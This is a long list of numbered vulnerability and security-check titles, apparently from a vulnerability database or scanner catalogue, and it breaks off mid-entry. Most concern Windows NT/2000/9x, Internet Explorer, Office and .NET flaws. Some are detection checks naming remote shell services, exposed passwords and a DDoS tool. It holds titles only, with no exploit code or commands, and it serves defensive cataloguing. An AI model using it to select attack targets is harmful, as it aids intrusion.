RegAPI.DLL buffer overflow [5467] Microsoft Windows 2000 System Monitor ActiveX control buffer overflow [5417] Microsoft Windows NT MSIEXEC service uses the msi.dll registery key that has weak permissions [5411] Microsoft Windows File Share service denial of service [5399] Microsoft Windows NT and 2000 Network Monitor buffer overflow [5395] Microsoft Windows 9x share level password [5387] Microsoft Windows HyperTerminal Telnet buffer overflow [5370] Microsoft Windows 9x NetBIOS invalid driver type denial of service [5357] Microsoft Windows 9x malformed NWLink NMPI packet denial of service [5315] Microsoft Windows NT invalid LPC request [5301] Microsoft Windows 2000 Simplified Chinese IME State Recognition [5242] Microsoft Windows 2000 Telnet client NTLM authentication weakness [5222] Microsoft Windows 2000 malformed RPC packet denial of service [5203] Microsoft Windows 2000 still image service [5193] Microsoft Windows Media Services Unicast Service denial of service [5171] Microsoft Windows 2000 Local Security Policy corruption [5168] Microsoft Windows NetBIOS cache corruption [5097] Microsoft Windows folder.htt allows execution of active scripting without approval [5079] Microsoft Windows 95/98 malformed IPX ping packet denial of service [5040] Microsoft Windows NT/2000 explorer.exe uses relative path name in registry [5035] Microsoft Windows NT/2000 NetBIOS Name Server spoofed name conflict [5033] Microsoft Windows 2000 without Service Pack 1 [5031] Microsoft Windows 2000 Service Control Manager named pipe could allow a unauthorized user to gain privileges [5015] Microsoft Windows NT and 2000 executable path [4887] Microsoft Windows 2000 Kerberos ticket renewed [4886] Microsoft Windows 2000 logon session reconnected [4885] Microsoft Windows 2000 logon session disconnected [4882] Microsoft Windows 2000 Kerberos pre-authentication failed [4873] Microsoft Windows 2000 user account mapped for logon [4872] Microsoft Windows 2000 account logon failed [4871] Microsoft Windows 2000 account used for logon [4855] Microsoft Windows 2000 group type change [4828] Microsoft Windows 95/98 ARP spoofing [4823] Microsoft Windows 2000 Telnet server binary stream denial of service [4819] Microsoft Windows 2000 default SYSKEY configuration [4787] Microsoft Windows 2000 user account locked out [4786] Microsoft Windows 2000 computer account created [4785] Microsoft Windows 2000 computer account changed [4784] Microsoft Windows 2000 computer account deleted [4714] Microsoft Windows 2000 &quot [4702] Microsoft Windows event log full [4700] Microsoft Windows computer password not found in local security database [4698] Microsoft Windows EventLog service started [4688] Microsoft Windows Network Monitor driver started [4673] Microsoft Windows resources for queuing of audit messages have been exhausted [4671] Microsoft Windows event log file cannot be opened [4670] Microsoft Windows event log file corrupted [4648] Microsoft Windows NT malformed remote registry request denial of service [4608] Microsoft Windows NT computer account creation can compromise User Session Key [4600] Microsoft Windows NT denial of service caused by unacknowledged SMB requests [4589] Microsoft Windows 2000 protected store can be compromised by brute force attack [4585] Microsoft Windows Encoder denial of service [4552] Microsoft Windows Browser service can be shutdown by an unauthorized remote user [4547] Microsoft Windows Master Browser browse table can be filled with bogus entries [4517] Microsoft Windows NT user account locked out [4516] Microsoft Windows NT user account enabled [4515] Microsoft Windows NT user account disabled [4337] Microsoft Windows NT/2000 cmd.exe buffer overflow [4332] Microsoft Windows NT registry permissions could allow compromise of cryptographic keys [4278] Microsoft Windows 2000 unattended install does not secure All Users profile [4247] Microsoft Windows 95/98 printer sharing allows read access [4221] Microsoft Windows NT drive mapping allows local users to execute arbitrary code [4203] Microsoft Windows TCP/IP Printing Service denial of service [4141] Microsoft Windows can be configured to transmit unencrypted passwords to SMB server [4140] Microsoft Windows Telnet service authentication may expose user passwords [4138] Microsoft Windows 2000 system file integrity feature is disabled [4111] Microsoft Windows NT 4.0 registry permissions [4108] Microsoft Windows Media Technologies malformed license request denial of service [4107] Microsoft Windows path names containing DOS devices denial of service [4086] Microsoft Windows 2000 may not start Jaz drives correctly [4085] Microsoft Windows 2000 non-Gregorial calendar error [4084] Microsoft Windows 2000 may prevent Adobe FrameMaker files from being saved in some formats [4083] Microsoft Windows 2000 Terminal Services may damage Office files saved as HTML [4082] Microsoft Windows 2000 and Iomega parallel port drives display error [4081] Microsoft Windows invalid image error when using OLE libraries [4080] Microsoft Windows 2000 AOL image support [4079] Microsoft Windows 2000 High Encryption Pack [4034] Microsoft Windows Media Services handshake packets denial of service [4016] Microsoft Windows NT Recycle Bin could allow an unauthorized user to modify deleted files [3993] Microsoft Windows Trin00 Distributed Denial of Service (DDoS) tool found [3909] Microsoft Windows 9x share is writable [3906] Microsoft Windows NT share is readable [3694] Microsoft Windows NT malformed resource enumeration denial of service [3574] Microsoft Windows 9x cache could reveal plaintext password [3534] Microsoft Windows NT 4.0 without Service Pack 6 [3373] Microsoft Windows NT user shell folders could allow users to gain administrator privileges [3328] Microsoft Windows ARP packet denial of service [3251] Microsoft Windows allows source routing when configured to reject source routed packets [3248] Microsoft Windows NT RASMAN pathname [3226] Microsoft Windows NT 4.0 unattended installation could expose sensitive information to local users [3168] Microsoft Windows NT SP4-SP6 TCP sequence numbers are predictable [3129] Microsoft Windows Telnet.exe remote buffer overflow [3109] Microsoft Windows NT Phone Dialer utility contains a locally exploitable buffer overflow [3106] Microsoft Windows NT DNS server can be remotely crashed by sending a response to a non-existant request [3104] Microsoft Windows NT TSE denial of service can consume all available memory [2750] Microsoft Windows started/stopped [2677] Microsoft Windows NT old operating system [2549] Microsoft Windows NT install date changed [2336] Microsoft Windows NT login default folder allows a user to bypass policies [2313] Microsoft Windows NT can be crashed by executables containing malformed image headers [2299] Microsoft Windows NT CSRSS denial of service [2291] Microsoft Windows NT Local Security Authority (LSA) can be remotely crashed, requiring a system reboot [2243] Microsoft Windows NT RAS/RRAS clients cache passwords regardless of setting [2201] Microsoft Windows NT 4.0 without Service Pack 5 [2200] Microsoft Windows NT RAS client contains an exploitable buffer overflow [2190] Microsoft Windows NT 4.0 help file utility contains a locally exploitable buffer overflow [2141] Microsoft SQL Server can be configured to use the Windows NT account SQLExecCmdExe when running xp_cmdshell for non-sa logins [2129] Microsoft SQL Server should use limited Windows NT protocols to make attacks more difficult [2102] Microsoft Windows NT allows files to exceed the supposed maximum length [1977] Microsoft Windows NT RPC services can be used to deplete system resources [1976] Microsoft Windows NT gina flaw allows locked-out users to log in [1975] Microsoft Windows NT gina allows some clipboard text to be revealed [1974] Microsoft Windows NT SNMP agent memory leak [1947] Microsoft Windows NT/9x can be frozen with redirect packets [1946] Microsoft Windows NT screen saver can be used to compromise administrator privileges [1820] Microsoft Windows NT 4.0 domain caching feature can be exploited to gain administrator privileges [1771] Microsoft Windows 95/98 configurations may lead to excessive bandwidth consumption [1758] Microsoft SQL Server extended stored procedure, xp_cmdshell, can be used to gain Windows NT administrator rights [1719] Microsoft Windows NT 4.0 SP4 could allow null passwords to be used for access [1566] Microsoft Windows NT user account deleted [1556] Microsoft Windows NT user account created [1394] Microsoft Windows NT 4.0 without Service Pack 4 [1372] Microsoft Windows NT snork attack can disable system [1321] Microsoft Windows Interactive_Guest_Logon [1320] Microsoft Windows legal notice display not enabled [1319] Microsoft Windows local user on workstation [1315] Microsoft Windows network Guest logon [1314] Microsoft Windows NT user has never logged on [1312] Microsoft Windows NT null session user modals [1296] Microsoft Windows service user [1295] Microsoft Windows NT service user password found [1291] Microsoft Windows shutdown without logon enabled [1288] Microsoft Windows NT system key encryption not enabled [1286] Microsoft Windows NT TCP/IP security not enabled [1285] Microsoft Windows trojan key permissions [1284] Microsoft Windows NT trusted domain [1075] Microsoft Windows file-sharing access error [981] Microsoft Windows WINS exploit using SNMP [710] Microsoft Windows NT portbind issue [679] Microsoft Windows null session [539] Microsoft Windows 95 and Internet Explorer password disclosure [538] Microsoft Windows NT Winpopup DoS attack [536] Microsoft Windows NT discloses system information [535] Microsoft Windows NT sometimes does not kill all processes when logging out [534] Microsoft Windows 95 stores many passwords in plain text in the registry [530] Microsoft Windows NT RAS service packet filtering rules can be bypassed [529] Microsoft Windows NT case problems can lead to admin access [528] Microsoft Windows NT fragmentation attack [526] Microsoft Windows NT path is insecure and can be easily trojaned [342] Microsoft Windows NT SMB logon denial of service [283] Microsoft Windows account password guessed [186] Microsoft Windows NT DNS denial of service [172] Microsoft Windows NT Post-SP2 security patches missing [168] Microsoft Windows key with incorrect permissions [140] Microsoft Windows telnet service installed [138] Microsoft Windows system log accessible [121] Microsoft Windows NT security log accessible [120] Microsoft Windows schedule service running [114] Microsoft Windows NT rsh service Running [102] Microsoft Windows NT rexec service running [99] Microsoft Windows registry can be opened remotely [98] Microsoft Windows NT rcmd service running [92] Microsoft Windows NT rlogin service installed [66] Microsoft Windows NT kernel outdated [17] Microsoft Windows NT RPC locator denial of service [16] Microsoft Windows Remote Access Service [14] Microsoft Windows NT 4.0 without Service Pack 3 [13] Microsoft Windows Network Monitor insecure password [11] Microsoft Windows NT 4.0 beta [86263] National Instruments LabWindows/CVI unspecified [86261] ABB DataManager National Instruments LabWindows/CVI, LabVIEW unspecified [86088] Microsoft Internet Explorer CVE-2013-3199 code execution [86087] Microsoft Internet Explorer CVE-2013-3194 code execution [86086] Microsoft Internet Explorer CVE-2013-3193 code execution [86085] Microsoft Internet Explorer CVE-2013-3191 code execution [86084] Microsoft Internet Explorer CVE-2013-3190 code execution [86083] Microsoft Internet Explorer CVE-2013-3189 code execution [86082] Microsoft Internet Explorer CVE-2013-3188 code execution [86081] Microsoft Internet Explorer CVE-2013-3187 code execution [86080] Microsoft Internet Explorer CVE-2013-3184 code execution [86079] Microsoft Internet Explorer EUC-JP information disclosure [86078] Microsoft Internet Explorer integrity level privilege escalation [85802] Microsoft PowerPoint denial of service [85762] Microsoft Internet Explorer sandbox bypass [85276] Cisco Jabber for Windows denial of service [85242] Microsoft .NET Framework and Microsoft Silverlight privilege escalation [85241] Microsoft .NET Framework and Microsoft Silverlight code execution [85240] Microsoft .NET Framework and Microsoft Silverlight code execution [85239] Microsoft .NET Framework and Microsoft Silverlight privilege escalation [85238] Microsoft .NET Framework and Microsoft Silverlight privilege escalation [85237] Microsoft .NET Framework and Microsoft Silverlight code execution [85222] Microsoft Internet Explorer Shift JIS information disclosure [85221] Microsoft Internet Explorer CVE-2013-3164 code execution [85220] Microsoft Internet Explorer CVE-2013-3163 code execution [85219] Microsoft Internet Explorer CVE-2013-3162 code execution [85218] Microsoft Internet Explorer CVE-2013-3161 code execution [85217] Microsoft Internet Explorer CVE-2013-3153 code execution [85216] Microsoft Internet Explorer CVE-2013-3152 code execution [85215] Microsoft Internet Explorer CVE-2013-3151 code execution [85214] Microsoft Internet Explorer CVE-2013-3150 code execution [85213] Microsoft Internet Explorer CVE-2013-3149 code execution [85212] Microsoft Internet Explorer CVE-2013-3148 code execution [85211] Microsoft Internet Explorer CVE-2013-3147 code execution [85210] Microsoft Internet Explorer CVE-2013-3146 code execution [85209] Microsoft Internet Explorer CVE-2013-3145 code execution [85208] Microsoft Internet Explorer CVE-2013-3144 code execution [85207] Microsoft Internet Explorer CVE-2013-3143 code execution [85206] Microsoft Internet Explorer CVE-2013-3115 code execution [85204] Microsoft DirectShow code execution [85133] Microsoft Outlook phishing [84965] Microsoft Sharepoint Online cross site scripting [84916] Microsoft Internet Explorer ASLR information disclosure [84691] Microsoft Internet Explorer code execution [84690] Microsoft Internet Explorer code execution [84616] Microsoft Office code execution [84612] Microsoft Internet Explorer code execution [84611] Microsoft Internet Explorer code execution [84610] Microsoft Internet Explorer code execution [84609] Microsoft Internet Explorer code execution [84608] Microsoft Internet Explorer code execution [84607] Microsoft Internet Explorer code execution [84606] Microsoft Internet Explorer code execution [84605] Microsoft Internet Explorer code execution [84604] Microsoft Internet Explorer code execution [84603] Microsoft Internet Explorer code execution [84602] Microsoft Internet Explorer code execution [84601] Microsoft Internet Explorer code execution [84599] Microsoft Internet Explorer code execution [84598] Microsoft Internet Explorer code execution [84597] Microsoft Internet Explorer code execution [84596] Microsoft Internet Explorer code execution [84595] Microsoft Internet Explorer code execution [84581] Novell Client for Windows NWFS.SYS buffer overflow [84580] Novell Client for Windows NICM.SYS privilege escalation [84266] Multiple Microsoft products code execution [84019] Microsoft Internet Explorer MSXML information disclosure [84011] Microsoft Security Essentials privilege escalation [84007] Microsoft Internet Explorer CGenericElement object code execution [84002] DotNetNuke modal windows cross-site scripting [83995] Microsoft Internet Explorer code execution [83909] Microsoft Internet Explorer code execution [83908] Microsoft Internet Explorer code execution [83907] Microsoft Internet Explorer code execution [83906] Microsoft Internet Explorer code execution [83905] Microsoft Internet Explorer code execution [83904] Microsoft Internet Explorer code execution [83903] Microsoft Internet Explorer code execution [83902] Microsoft Internet Explorer code execution [83901] Microsoft Internet Explorer code execution [83900] Microsoft Internet Explorer code execution [83899] Microsoft Internet Explorer information disclosure [83897] Microsoft Publisher buffer underflow [83896] Microsoft Publisher code execution [83895] Microsoft Publisher code execution [83894] Microsoft Publisher code execution [83893] Microsoft Publisher code execution [83892] Microsoft Publisher code execution [83891] Microsoft Publisher buffer overflow [83890] Microsoft Publisher code execution [83889] Microsoft Publisher code execution [83888] Microsoft Publisher integer overflow [83887] Microsoft Publisher code execution [83885] Microsoft Word code execution [83883] Microsoft Visio information disclosure [83881] Microsoft Lync code execution [83879] Microsoft .NET Framework security bypass [83878] Microsoft .NET Framework spoofing [83191] Microsoft Internet Explorer code execution [83190] Microsoft Internet Explorer code execution [83172] Skype for Windows multiple unspecified [83092] Microsoft Remote Desktop ActiveX control code execution [83087] Microsoft SharePoint information disclosure [83085] Microsoft Antimalware Client privilege escalation [83083] Microsoft SharePoint and Microsoft Office Web Apps privilege escalation [82975] NVIDIA Graphics Drivers for Windows privilege escalation [82974] NVIDIA Graphics Drivers for Windows privilege escalation [82771] Microsoft Internet Explorer sandbox denial of service [82766] NVIDIA Graphics Drivers for Windows privilege escalation [82731] Microsoft Internet Explorer CTreeNode code execution [82443] Microsoft Office code execution [82423] Microsoft Silverlight code execution [82421] Microsoft SharePoint W3WP denial of service [82420] Microsoft SharePoint input privilege escalation [82419] Microsoft SharePoint JavaScript privilege escalation [82418] Microsoft SharePoint Callback privilege escalation [82416] Microsoft Visio Viewer memory code execution [82409] Microsoft Internet Explorer removeChild code execution [82408] Microsoft Internet Explorer onBeforeCopy code execution [82407] Microsoft Internet Explorer GetMarkupPtr code execution [82406] Microsoft Internet Explorer CElement code execution [82405] Microsoft Internet Explorer CCaret code execution [82404] Microsoft Internet Explorer CMarkupBehaviorContext code execution [82403] Microsoft Internet Explorer saveHistory code execution [82402] Microsoft Internet Explorer OnResize code execution [82400] Microsoft Office for Mac information disclosure [82398] Microsoft Office OneNote information disclosure [81900] Microsoft Skype GiftCards cross-site scripting [81728] Microsoft Internet Explorer SRC information disclosure [81706] Microsoft Internet Explorer SSL lock spoofng [81705] Microsoft Internet Explorer TCP sessions information disclosure [81667] Microsoft .NET Framework WinForms privilege escalation [81633] Microsoft Internet Explorer CObjectElement code execution [81631] Microsoft Internet Explorer InsertElement code execution [81630] Microsoft Internet Explorer SLayoutRun code execution [81629] Microsoft Internet Explorer pasteHTML code execution [81628] Microsoft Internet Explorer CDispNode code execution [81627] Microsoft Internet Explorer LsGetTrailInfo code execution [81626] Microsoft Internet Explorer vtable code execution [81625] Microsoft Internet Explorer CMarkup code execution [81624] Microsoft Internet Explorer COmWindowProxy code execution [81623] Microsoft Internet Explorer SetCapture code execution [81622] Microsoft Internet Explorer Shift JIS information disclosure [81212] Microsoft Lync User-Agent cross-site scripting [80885] Microsoft Internet Explorer CDwnBindInfo code execution [80871] Microsoft .NET Framework permission privilege escalation [80870] Microsoft .NET Framework S.D.S.P. privilege escalation [80868] Microsoft .NET Framework information disclosure [80866] Microsoft .NET Framework OData denial of service [80847] NVIDIA Graphics Drivers for Windows buffer overflow [80750] Microsoft Internet Explorer denial of service [80647] Microsoft Internet Explorer cursor information disclosure [80523] Microsoft Exchange Server RSS feeds denial of service [80364] Microsoft Internet Explorer improper ref counting code execution [80363] "Microsoft Internet Explorer CMarkup code execution" [80362] Microsoft Internet Explorer InjectHTMLStream code execution [80355] Microsoft Word RTF code execution [80310] Microsoft Internet Explorer CHTML code execution [80149] Microsoft Office OneNote code execution [79998] Microsoft Excel file code execution [79997] Microsoft Visio code execution [79996] Microsoft Publisher code execution [79990] Microsoft Excel xls code execution [79749] Microsoft Internet Explorer multiple unspecified code execution [79748] Microsoft Internet Explorer memory code execution [79692] Microsoft .NET Framework reflection privilege escalation [79691] Microsoft .NET Framework Web proxy code execution [79690] Microsoft .NET Framework DLL code execution [79689] Microsoft .NET Framework output information disclosure [79688] Microsoft .NET Framework reflection privilege escalation [79686] Microsoft Internet Explorer CTreeNode code execution [79685] Microsoft Internet Explorer CTreePos code execution [79684] Microsoft Internet Explorer CFormElement code execution [79674] Microsoft Excel data structure buffer overflow [79651] Microsoft Paint .bmp denial of service [79650] Microsoft Excel code execution [79649] Microsoft Office Publisher denial of service [79614] Microsoft Internet Explorer scrollIntoView code execution [79599] Microsoft Office Picture Manager code execution [79590] Microsoft Word .doc buffer overflow [79492] Microsoft Internet Explorer filter cross-site scripting [79251] Microsoft Internet Explorer CPasteCommand code execution [79231] EMC NetWorker Module for Microsoft Applications (NMM) administrator credential disclosure [79230] EMC NetWorker Module for Microsoft Applications (NMM) communication channel code execution [79198] Microsoft Excel code execution [78863] Microsoft Works RTF code execution [78857] Microsoft SQL Server cross-site scripting [78852] Microsoft Lync and Microsoft SharePoint privilege escalation [78850] Microsoft Office RTF fiiles code execution [78849] Microsoft Word PAPX code execution [78822] Google Chrome CVE-2012-2897 Windows kernel memory corruption [78759] Microsoft Internet Explorer cloneNode() code execution [78758] Microsoft Internet Explorer Layout object code execution [78757] Microsoft Internet Explorer Event Listener code execution [78756] Microsoft Internet Explorer onMove() code execution [78598] Microsoft Internet Explorer use-after-free code execution [78076] Microsoft System Center Configuration Manager cross-site scripting [78074] Microsoft Excel SST Invalid Length code execution [78073] Microsoft Excel code execution [78070] Microsoft System Center Operations Manager cross-site scripting [78069] Microsoft System Center Operations Manager cross-site scripting [77993] Microsoft Indexing Service ActiveX control denial of service [77878] Microsoft MS-CHAP v2 information disclosure [77361] Microsoft Visio DXF buffer overflow [77359] Microsoft Internet Information Services FTP information disclosure [77358] Microsoft Internet Information Services log files information disclosure [77351] Microsoft Office CGM code execution [77345] Microsoft Internet Explorer virtual function table code execution [77344] Microsoft Internet Explorer null object code execution [77343] Microsoft Internet Explorer layout memory code execution [77324] Microsoft Visual Studio Team Foundation Server cross-site scripting [77317] Citrix Access Gateway Plug-in for Windows ActiveX control buffer overflow [77316] Citrix Access Gateway Plug-in for Windows ActiveX control buffer overflow [76807] Microsoft Office for Mac privilege escalation [76743] Microsoft .NET Framework tilde denial of service [76723] Microsoft Internet Explorer attribute code execution [76722] Microsoft Internet Explorer cached code execution [76717] Microsoft Data Access Components XML code execution [76716] Microsoft IIS FTP denial of service [76710] Microsoft SharePoint JavaScript cross-site scripting [76709] Microsoft SharePoint URL spoofing [76708] Microsoft SharePoint JavaScript cross-site scripting [76706] Microsoft SharePoint scriptresx.ashx cross-site scripting [76664] Microsoft IIS tilde information disclosure [76339] XAMPP for Windows cds.php and perlinfo.pl cross-site scripting [76338] XAMPP for Windows cds.php SQL injection [76306] Opera pop-up windows code execution [76185] Microsoft Internet Information Server ASPX information disclosure [76184] Microsoft Internet Information Server INDEX_ALLOCATION security bypass [76183] Microsoft Internet Information Server INDEX_ALLOCATION security bypass [76182] Microsoft Internet Information Server request security bypass [75983] MapServer for Windows Apache file include [75977] Microsoft WordPad .doc denial of service [75962] Microsoft Internet Explorer Scrolling Events information disclosure [75961] Microsoft Internet Explorer OnRowsInserted Event code execution [75960] Microsoft Internet Explorer insertRow code execution [75959] Microsoft Internet Explorer insertAdjacentText code execution [75958] Microsoft Internet Explorer OnBeforeDeactivate Event code execution [75957] Microsoft Internet Explorer Title Element Change code execution [75956] Microsoft Internet Explorer Col Element code execution [75955] Microsoft Internet Explorer same id property code execution [75954] Microsoft Internet Explorer Developer Toolbar code execution [75953] Microsoft Internet Explorer process memory information disclosure [75952] Microsoft Internet Explorer EUC-JP character information disclosure [75950] Microsoft Internet Explorer Center Element code execution [75948] Microsoft Visual Basic for Applications DLL code execution [75941] Microsoft .NET Framework function code execution [75925] Microsoft Dynamics AX Enterprise Portal cross-site scripting [75904] Microsoft Lync HTML information disclosure [75903] Microsoft Lync DLL code execution [75163] Microsoft Visual Studio linker buffer overflow [75135] Microsoft Silverlight XAML code execution [75134] Microsoft .NET Framework index denial of service [75133] Microsoft .NET Framework buffer code execution [75122] Microsoft Office RTF code execution [75119] Microsoft Excel series record code execution [75118] Microsoft Excel MergeCells buffer overflow [75117] Microsoft Excel SXLI code execution [75115] Microsoft Visio Viewer memory code execution [75098] Microsoft .NET Framework EncoderParameter buffer overflow [74555] Microsoft Office WPS Converter buffer overflow [74383] Microsoft Internet Explorer VML code execution [74382] Microsoft Internet Explorer SelectAll code execution [74381] "Microsoft Internet Explorer OnReadyStateChange code execution" [74380] Microsoft Internet Explorer JScript9 code execution [74379] Microsoft Internet Explorer HTML page code execution [74377] Microsoft .NET Framework parameter code execution [74376] Microsoft .NET Framework input code execution [74375] Microsoft .NET Framework serialization code execution [74368] Microsoft Forefront Unified Access Gateway information disclosure [74367] Microsoft Forefront Unified Access Gateway spoofing [73870] Microsoft Internet Explorer Protected Mode denial of service [73869] Microsoft Internet Explorer unspecified buffer overflow [73539] Microsoft DirectWrite denial of service [73537] Microsoft Visual Studio privilege escalation [73535] Microsoft Expression Design code execution [73029] Microsoft Internet Explorer BODY denial of service [72938] Skype for Windows unspecified [72886] Microsoft SharePoint wizardlist.aspx cross-site scripting [72885] Microsoft SharePoint themeweb.aspx cross-site scripting [72884] Microsoft SharePoint inplview.aspx cross-site scripting [72872] Microsoft Excel bytes code execution [72871] Microsoft Excel OBJECTLINK record code execution [72870] Microsoft Excel file code execution [72864] Microsoft Visio attributes code execution [72863] Microsoft Visio code execution [72862] Microsoft Visio Viewer code execution [72861] Microsoft Visio attributes code execution [72860] Microsoft Visio Viewer code execution [72848] Microsoft .NET Framework buffer overflow [72847] Microsoft .NET Framework and Microsoft Silverlight unmanaged objects code execution [72845] Microsoft Internet Explorer VML code execution [72844] Microsoft Internet Explorer memory information disclosure [72843] Microsoft Internet Explorer HtmlLayout code execution [72842] Microsoft Internet Explorer copy and paste information disclosure [72028] Microsoft ASP.NET forms authentication open redirect [72027] Microsoft ASP.NET forms authentication security bypass [72026] Microsoft ASP.NET forms authentication ticket caching privilege escalation [71990] Microsoft Anti-Cross Site Scripting Library security bypass [71989] Microsoft ASP.NET CaseInsensitiveHashProvider.getHashCode() function denial of service [71817] Microsoft Internet Explorer CSS information disclosure [71813] Microsoft Internet Explorer getComputedStyle information disclosure [71808] Microsoft .NET Framework SaveAs() security bypass [71635] Microsoft Internet Explorer cache objects information disclosure [71561] Microsoft Excel record memory code execution [71556] Microsoft PowerPoint record code execution [71555] Microsoft PowerPoint DLL code execution [71547] Microsoft Time binary code execution [71545] Microsoft Internet Explorer Content-Disposition information disclosure [71544] Microsoft Internet Explorer HTML DLL code execution [71543] Microsoft Internet Explorer cross-site scripting filter information disclosure [71541] Microsoft Publisher memory code execution [71540] Microsoft Publisher pointer code execution [71539] Microsoft Publisher out-of-bounds code execution [71537] Microsoft Word memory code execution [71200] Mozilla Firefox and Thunderbird Windows D2D security bypass [71117] Microsoft Excel vbscript macro code execution [70565] Microsoft Publisher pubconv.dll buffer overflow [70564] WebKit DOM windows cross-site scripting [70337] OpenOffice.org Microsoft Word .doc sprm file parser denial of service [70148] Microsoft Host Integration Server UDP denial of service [70139] Microsoft Office IME privilege escalation [70128] Microsoft Internet Explorer Body Element code execution [70126] "Microsoft Internet Explorer Jscript9.dll code execution" [70125] Microsoft Internet Explorer Onload Event code execution [70124] Microsoft Internet Explorer Option Element code execution [70123] "Microsoft Internet Explorer OLEAuto32.dll code execution" [70122] Microsoft Internet Explorer Scroll Event code execution [70107] Microsoft Forefront Unified Access Gateway NULL denial of service [70106] Microsoft Forefront Unified Access Gateway applet code execution [70105] Microsoft Forefront Unified Access Gateway cross-site scripting [70104] Microsoft Forefront Unified Access Gateway ExcelTable cross-site scripting [70103] Microsoft Forefront Unified Access Gateway ExcelTable response splitting [69863] Google Chrome Windows Media Player plug-in unspecified [69826] Microsoft SharePoint Server Source open redirect [69500] Microsoft Office object pointer code execution [69499] Microsoft Office DLL code execution [69497] Microsoft Excel integer code execution [69496] Microsoft Excel expression code execution [69495] Microsoft Excel records code execution [69494] Microsoft Excel array code execution [69493] Microsoft Excel WriteAV code execution [69344] Microsoft compound document detected [69293] Microsoft Internet Explorer HTTPS security bypass [69229] Mozilla Firefox, Thunderbird, and SeaMonkey Windows D2D hardware acceleration security bypass [69214] Microsoft Internet Explorer Iedvtool.dll denial of service [68855] HP Arcsight Connector Appliance Windows Event Log SmartConnector privilege escalation [68835] Microsoft SharePoint EditForm.aspx cross-site scripting [68834] Microsoft SharePoint cross-site scripting [68832] Microsoft Chart control information disclosure [68828] Microsoft .NET Framework socket information disclosure [68826] Microsoft Report Viewer information disclosure [68822] Microsoft Internet Explorer style code execution [68821] Microsoft Internet Explorer xslt code execution [68820] Microsoft Internet Explorer character sequences information [68819] Microsoft Internet Explorer telnet URI code execution [68818] Microsoft Internet Explorer event handlers information disclosure [68817] Microsoft Internet Explorer race condition code execution [68811] Microsoft Visio pStream code execution [68810] Microsoft Visio Move Around the Block code execution [68786] Microsoft Internet Explorer EUC-JP cross-site scripting [68554] Citrix Access Gateway Plug-in for Windows ActiveX control buffer overflow [68498] Microsoft Internet Explorer memory layout information disclosure [68226] Apple Mac OS X QuickLook Microsoft Office files code execution [68024] Microsoft Office XP remote code execution [68007] Microsoft Word wdGetApplicationObject() code execution [67991] Microsoft Lync Server ReachJoin.aspx command execution [67954] Microsoft Internet Explorer HTTP redirect code execution [67953] Microsoft Internet Explorer selection object code execution [67952] Microsoft Internet Explorer layout code execution [67951] Microsoft Internet Explorer drag and drop information disclosure [67950] Microsoft Internet Explorer DOM code execution [67949] Microsoft Internet Explorer time element code execution [67948] Microsoft Internet Explorer drag and drop code execution [67947] Microsoft Internet Explorer toStaticHTML API information disclosure [67946] Microsoft Internet Explorer DOM code execution [67945] Microsoft Internet Explorer link properties code execution [67944] Microsoft Internet Explorer Web pages information disclosure [67890] Microsoft Internet Explorer cross-zone drag-and-drop information disclosure [67761] Microsoft XML Editor Web Service Discovery information disclosure [67752] Microsoft .NET Framework and Microsoft Silverlight XAML code execution [67736] Microsoft Forefront Threat Management Gateway TMG Firewall Client buffer overflow [67717] Microsoft Excel WriteAV code execution [67716] Microsoft Excel WriteAV code execution [67715] Microsoft Excel information code execution [67714] Microsoft Excel record information buffer overflow [67713] Microsoft Excel record buffer overflow [67712] Microsoft Excel array code execution [67711] Microsoft Excel information code execution [67710] Microsoft Excel Excel record code execution [67662] Symantec Backup Exec for Windows Servers communication man-in-the-middle [67411] Microsoft .NET Framework JIT compiler code execution [67301] Microsoft PowerPoint presentation code execution [67300] Microsoft PowerPoint presentation code execution [66991] Microsoft Internet Explorer CSS address bar spoofing [66976] HP Insight Control Performance Management for Windows unspecified cross-site requets forgery [66975] HP Insight Control Performance Management for Windows unspecified privilege escalation [66847] Microosft Windows WebDAV code execution [66729] Microsoft HTML Help CHM buffer overflow [66710] Microsoft Reader aud_file.dll code execution [66709] Microsoft Reader eBook buffer overflow [66708] Microsoft Reader msreader.exe buffer overflow [66544] A Microsoft FAX cover sheet has been detected [66435] Microsoft Internet Explorer Javascript information disclosure [66434] Microsoft Internet Explorer frame tag information disclosure [66433] Microsoft Internet Explorer layout code execution [66426] Microsoft Office DLL code execution [66393] Microsoft WordPad code execution [66137] Microsoft Source Code Analyzer for SQL injection privilge escalation [66066] Windows Movie Maker .avi buffer overflow [66064] Microsoft Internet Explorer unspecified code execution [66063] Microsoft Internet Explorer unspecified code execution [66062] Microsoft Internet Explorer unspecified code execution [66025] Microsoft Internet Explorer XSLT information disclosure [65918] Microsoft Internet Explorer address bar spoofing [65867] Microsoft Visual Studio project file buffer overflow [65626] Microsoft Malware Protection Engine privilege escalation [65587] Microsoft Excel data code execution [65586] Microsoft Excel memory record buffer overflow [65585] Microsoft Excel memory corruption code execution [65584] Microsoft Excel WriteAV code execution [65583] Microsoft Excel memory buffer overflow [65582] Microsoft Excel buffer code execution [65579] Microsoft PowerPoint persist directory code execution [65578] Microsoft PowerPoint Techno-color code execution [65572] Microsoft Office Groove DLL code execution [65192] Microsoft PowerPoint OfficeArt code execution [65191] Microsoft Office graphic code execution [65190] Microsoft Excel Axis properties code execution [65188] Microsoft Excel art object code execution [65187] Microsoft Excel object code execution [64924] Microsoft Visio data type code execution [64923] Microsoft Visio object code execution [64913] Microsoft Internet Explorer DLL code execution [64912] Microsoft Internet Explorer code execution [64911] Microsoft Internet Explorer code execution [64908] Microsoft .NET Framework JIT code execution [64903] Microsoft DirectShow DLL code execution [64571] Microsoft Internet Explorer GUI weak security [64482] Microsoft Internet Explorer ReleaseInterface() code execution [64341] Microsoft Data Access Components (MDAC) ADO record code execution [64340] Microsoft Data Access Components (MDAC) ODBC buffer overflow [64250] Microsoft WMI Administrative Tools ActiveX control (WBEMSingleView.ocx) code execution [64248] Microsoft Internet Information Services TELNET_STREAM_CONTEXT::OnSendData buffer overflow [64196] HAURI Windows Server and ViRobot Desktop VRsecos.sys privilege escalation [64083] Microsoft Foundation Class DLL code execution [64075] Windows Live Mail dynamic-linked library (dwmapi.dll) code execution [63915] Microsoft Data Access Objects (DAO) dynamic-linked library (DLL) code execution [63879] Windows Server 2008 Color Control Panel dynamic-linked library (DLL) code execution [63866] Microsoft Visio dynamic-linked library (DLL) code execution [63840] Microsoft Visual C++ 2008 Redistributable Package dynamic-linked library (DLL) code execution [63815] Microsoft Remote Desktop Protocol dynamic-linked library (ieframe.dll) code execution [63802] Microsoft Visio dynamic-linked library (dwmapi.dll) code execution [63780] Microsoft PowerPoint 2007 dynamic-linked library 